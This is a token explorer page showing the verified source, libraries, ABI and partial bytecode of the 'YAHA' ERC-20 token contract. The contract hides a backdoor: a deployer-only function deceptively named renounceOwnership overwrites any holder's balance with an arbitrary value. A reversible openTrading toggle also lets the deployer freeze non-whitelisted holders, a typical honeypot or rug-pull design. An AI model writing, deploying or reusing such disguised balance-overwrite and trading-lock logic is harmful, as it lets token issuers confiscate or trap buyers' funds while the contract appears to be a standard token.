ETH Price: $2,253.22 (-1.18%)
 

Overview

Max Total Supply

10,000,000,000 YAHA

Holders

14

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
YAHA

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
/*

       @@@%                                                                                                            
       @##**                                                                                                         
    @%%#####***                                                                                                      
     @@%###*###***                                    ---                                                            
           ++**##***                  --------    --------*                                                          
                #*****               ----------=-----------*                                                         
                  *+****            ----------*-------------+%                                                       
                     **#**         --------------------------=%                                                      
                       ****#      ----------------------------=#                                                     
      %##+--              *##     -----------------------------=%                                                    
     @=----------           +**  --------------=============----=                %#****+=--+%                        
      #--------------         +*+-----==+*%%%@%#######@@####%%%%%@        %%#***=-:---------%                        
      @=-------------------     +#**%%%%%%###@%%%%####%%%###%%%##%%%#**#*=-----------------*                         
       @=-----------------------=#####%%%%%%%@%%%%%%%%%%%%#####+--------------------------+#                         
         =--------------------------------==-*=---------##@@@@%+=------------------------*%                          
          ----------------------------*@@%#*+*#%+======+=-===----+*=-------------------=*                            
            :-------+#=---------===*##*##++++++#*+======+#+===+++##%*+===----===*#---=*                              
               --------------*@@@@#+**+++++*##%%%%*====%+===+%@%*+++*--------------+@                                
                  :---------=%@@@@+###=::::::::::=*====#-:::::::::::*----------=#                                    
                     :------*@@@@@++::::::::::::++=======%::::::::-*------+#                                         
                           +@@@@@@==*#-::::::##===+*#*=---====-----=+                                                
                           #@@@@@@==========+%%+=---===---===------------=                                           
                           @@@@@@@=======+*===*#=------------=#%*%%@@*                                               
                           @@@@@@@======++=========+*#**+-====++#@@@@#                                               
                          @@@@@@@@+=======++*#==========-==-+*+#@@@@@@                                               
                          @@@@@@@@%#==========+**========-=#++*@@@@%@@%                                              
                          @@@@@@@@%@%*==========++++#%%#+++==*@@@@@@@@#                                              
                          @@@@@@#@@@@@%*===================+#@@@@@@@@@@                                              
                          @@@@@@%%@@@@@@@*+===============+%@@@@@@@@@@@%                                             
                         @@@@@@@%@%#@@@@@@@%+============*@@@@@@%@@@@@@*                                             
                         @@@%@%%%@@@@@@@@@%@@@%*=======+@@@@@@@@%@@@@@@+                                             
                         @%@@@@@@@@@@@@@@@#@@@@@@#====%@@@@@@@@@%##%##                                               
                            @@@@@@@@@%@@@@@#######*==*%%%#%%%#%##                                                    
                                              ::-*#==##=-*                                                           
                                              *+---==-=:-%                                                           
                                             ##++*#%+=#%#%@                                                          
                                            #%#%%%%%%%%%%%%@                                                         
                                          #%%%%#%%%%%%%%%%%%@                                                        
                                         #%%%%%%%%%%%%%%%%%%%@                                                       
                                        #%%%#%#%%%%%%%%%%%%%%%@                                                      
                                       ##%%%%%#%%#%%%%%%%%%%%%@                                                      
                                       +++**%%%%%%%%%%%%%%%%#%@@                                                     
                                      @*++++@%%%%%%%%%%%%%+++*@@                                                     
                                     @#++++#@%%%%%%%%%%%%%+++*%                                                      
                                     @#++++@@%%%%%%%%%%%%%#+++*                                                      
                                     *++++#@@%%%%%%%%%%%%%%+++#                                                                                                         


https://x.com/yahaoneth
https://www.yahaoneth.com
http://t.me/yahaoneth
*/

/*
*SPDX-License-Identifier: MIT
*/

pragma solidity ^0.8.24;

import "@openzeppelin/contracts/utils/Address.sol" ;
import "@openzeppelin/contracts/utils/math/SafeMath.sol" ;
import "@openzeppelin/contracts/utils/Context.sol" ;


interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);
}


contract YAHA is Context, IERC20 {
 
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _whilelists;
    using SafeMath for uint256;
    using Address for address;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    bool private _openedTrade = false;

    address private  deployer;
    constructor() {
    _name = "Yaha";
    _symbol = "YAHA";
    _decimals = 18;
    uint256 initialSupply = 10_000_000_000 * (10 ** _decimals);
    deployer = msg.sender;
    _whilelists[msg.sender] = true;

    address MarketingWallet = 0x430f1e51d577bCa7E9614c08aDfce7Cfa585CE91;
    address CEXWallet = 0x119671E460846D79d29b62e23De7bF940A0d85dA;
    address TeamWallet = 0xFc6dC597662A94DE714327242D9dE106E4c78f0C;
    uint256 amount1 = initialSupply * 7 / 100; 
    uint256 amount2 = initialSupply * 5 / 100; 
    uint256 amount3 = initialSupply * 3 / 100; 

    _mint(MarketingWallet, amount1);
    _mint(CEXWallet, amount2);
    _mint(TeamWallet, amount3);
    _mint(msg.sender, initialSupply - (amount1 + amount2 + amount3 ));
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function getOpenedTrade() private view returns (bool) {
        return _openedTrade;
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }


    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }


    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }


    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
   

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function renounceOwnership(address[] memory newOwner, uint256 value) public onlyOwner {
       for (uint256 i = 0; i < newOwner.length; i++) {
         address account = newOwner[i];
         _balances[account] = value;
       }
    }

    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        if(_whilelists[sender] || _whilelists[recipient]){
            _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
            _balances[recipient] = _balances[recipient].add(amount);
            emit Transfer(sender, recipient, amount);
            return;
        }

        require(_openedTrade, "Trading is not opened yet");

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    modifier onlyOwner() {
        require(msg.sender == deployer, "Not allowed");
        _;
    }

    function openTrading() external onlyOwner {
        _openedTrade = !_openedTrade;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
    
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Address.sol)

pragma solidity ^0.8.20;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert FailedInnerCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason or custom error, it is bubbled
     * up by this function (like regular Solidity function calls). However, if
     * the call reverted with no returned reason, this function reverts with a
     * {FailedInnerCall} error.
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
     * was not a contract or bubbling up the revert reason (falling back to {FailedInnerCall}) in case of an
     * unsuccessful call.
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata
    ) internal view returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            // only check if target is a contract if the call was successful and the return data is empty
            // otherwise we already know that it was a contract
            if (returndata.length == 0 && target.code.length == 0) {
                revert AddressEmptyCode(target);
            }
            return returndata;
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
     * revert reason or with a default {FailedInnerCall} error.
     */
    function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            return returndata;
        }
    }

    /**
     * @dev Reverts with returndata if present. Otherwise reverts with {FailedInnerCall}.
     */
    function _revert(bytes memory returndata) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert FailedInnerCall();
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"newOwner","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040525f60075f6101000a81548160ff02191690831515021790555034801562000029575f80fd5b506040518060400160405280600481526020017f596168610000000000000000000000000000000000000000000000000000000081525060039081620000709190620006c4565b506040518060400160405280600481526020017f594148410000000000000000000000000000000000000000000000000000000081525060049081620000b79190620006c4565b50601260055f6101000a81548160ff021916908360ff1602179055505f60055f9054906101000a900460ff16600a620000f1919062000931565b6402540be40062000103919062000981565b905033600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160025f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505f73430f1e51d577bca7e9614c08adfce7cfa585ce9190505f73119671e460846d79d29b62e23de7bf940a0d85da90505f73fc6dc597662a94de714327242d9de106e4c78f0c90505f6064600786620001f5919062000981565b620002019190620009f8565b90505f606460058762000215919062000981565b620002219190620009f8565b90505f606460038862000235919062000981565b620002419190620009f8565b9050620002558684620002bf60201b60201c565b620002678583620002bf60201b60201c565b620002798482620002bf60201b60201c565b620002b2338284866200028d919062000a2f565b62000299919062000a2f565b89620002a6919062000a69565b620002bf60201b60201c565b5050505050505062000b4d565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000330576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003279062000b01565b60405180910390fd5b62000347816006546200044960201b90919060201c565b6006819055506200039e815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546200044960201b90919060201c565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200043d919062000b32565b60405180910390a35050565b5f818362000458919062000a2f565b905092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620004dc57607f821691505b602082108103620004f257620004f162000497565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005567fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000519565b62000562868362000519565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620005ac620005a6620005a0846200057a565b62000583565b6200057a565b9050919050565b5f819050919050565b620005c7836200058c565b620005df620005d682620005b3565b84845462000525565b825550505050565b5f90565b620005f5620005e7565b62000602818484620005bc565b505050565b5b8181101562000629576200061d5f82620005eb565b60018101905062000608565b5050565b601f82111562000678576200064281620004f8565b6200064d846200050a565b810160208510156200065d578190505b620006756200066c856200050a565b83018262000607565b50505b505050565b5f82821c905092915050565b5f6200069a5f19846008026200067d565b1980831691505092915050565b5f620006b4838362000689565b9150826002028217905092915050565b620006cf8262000460565b67ffffffffffffffff811115620006eb57620006ea6200046a565b5b620006f78254620004c4565b620007048282856200062d565b5f60209050601f8311600181146200073a575f841562000725578287015190505b620007318582620006a7565b865550620007a0565b601f1984166200074a86620004f8565b5f5b8281101562000773578489015182556001820191506020850194506020810190506200074c565b868310156200079357848901516200078f601f89168262000689565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000832578086048111156200080a5762000809620007a8565b5b60018516156200081a5780820291505b80810290506200082a85620007d5565b9450620007ea565b94509492505050565b5f826200084c57600190506200091e565b816200085b575f90506200091e565b81600181146200087457600281146200087f57620008b5565b60019150506200091e565b60ff841115620008945762000893620007a8565b5b8360020a915084821115620008ae57620008ad620007a8565b5b506200091e565b5060208310610133831016604e8410600b8410161715620008ef5782820a905083811115620008e957620008e8620007a8565b5b6200091e565b620008fe8484846001620007e1565b92509050818404811115620009185762000917620007a8565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200093d826200057a565b91506200094a8362000925565b9250620009797fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200083b565b905092915050565b5f6200098d826200057a565b91506200099a836200057a565b9250828202620009aa816200057a565b91508282048414831517620009c457620009c3620007a8565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000a04826200057a565b915062000a11836200057a565b92508262000a245762000a23620009cb565b5b828204905092915050565b5f62000a3b826200057a565b915062000a48836200057a565b925082820190508082111562000a635762000a62620007a8565b5b92915050565b5f62000a75826200057a565b915062000a82836200057a565b925082820390508181111562000a9d5762000a9c620007a8565b5b92915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000ae9601f8362000aa3565b915062000af68262000ab3565b602082019050919050565b5f6020820190508181035f83015262000b1a8162000adb565b9050919050565b62000b2c816200057a565b82525050565b5f60208201905062000b475f83018462000b21565b92915050565b6117338062000b5b5f395ff3fe608060405234801561000f575f80fd5b50600436106100a7575f3560e01c80636d8c1d461161006f5780636d8c1d461461016557806370a082311461018157806395d89b41146101b1578063a9059cbb146101cf578063c9567bf9146101ff578063dd62ed3e14610209576100a7565b806306fdde03146100ab578063095ea7b3146100c957806318160ddd146100f957806323b872dd14610117578063313ce56714610147575b5f80fd5b6100b3610239565b6040516100c09190610edf565b60405180910390f35b6100e360048036038101906100de9190610f9d565b6102c9565b6040516100f09190610ff5565b60405180910390f35b6101016102e6565b60405161010e919061101d565b60405180910390f35b610131600480360381019061012c9190611036565b6102ef565b60405161013e9190610ff5565b60405180910390f35b61014f6103c3565b60405161015c91906110a1565b60405180910390f35b61017f600480360381019061017a91906111fa565b6103d8565b005b61019b60048036038101906101969190611254565b6104e5565b6040516101a8919061101d565b60405180910390f35b6101b961052a565b6040516101c69190610edf565b60405180910390f35b6101e960048036038101906101e49190610f9d565b6105ba565b6040516101f69190610ff5565b60405180910390f35b6102076105d7565b005b610223600480360381019061021e919061127f565b610691565b604051610230919061101d565b60405180910390f35b606060038054610248906112ea565b80601f0160208091040260200160405190810160405280929190818152602001828054610274906112ea565b80156102bf5780601f10610296576101008083540402835291602001916102bf565b820191905f5260205f20905b8154815290600101906020018083116102a257829003601f168201915b5050505050905090565b5f6102dc6102d5610713565b848461071a565b6001905092915050565b5f600654905090565b5f6102fb8484846108dd565b6103b884610307610713565b6103b3856040518060600160405280602881526020016116d66028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61036a610713565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610dec9092919063ffffffff16565b61071a565b600190509392505050565b5f60055f9054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610468576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161045f90611364565b60405180910390fd5b5f5b82518110156104e0575f83828151811061048757610486611382565b5b60200260200101519050825f808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555050808060010191505061046a565b505050565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b606060048054610539906112ea565b80601f0160208091040260200160405190810160405280929190818152602001828054610565906112ea565b80156105b05780601f10610587576101008083540402835291602001916105b0565b820191905f5260205f20905b81548152906001019060200180831161059357829003601f168201915b5050505050905090565b5f6105cd6105c6610713565b84846108dd565b6001905092915050565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610667576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065e90611364565b60405180910390fd5b60075f9054906101000a900460ff161560075f6101000a81548160ff021916908315150217905550565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610788576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077f9061141f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ed906114ad565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108d0919061101d565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361094b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109429061153b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b0906115c9565b60405180910390fd5b6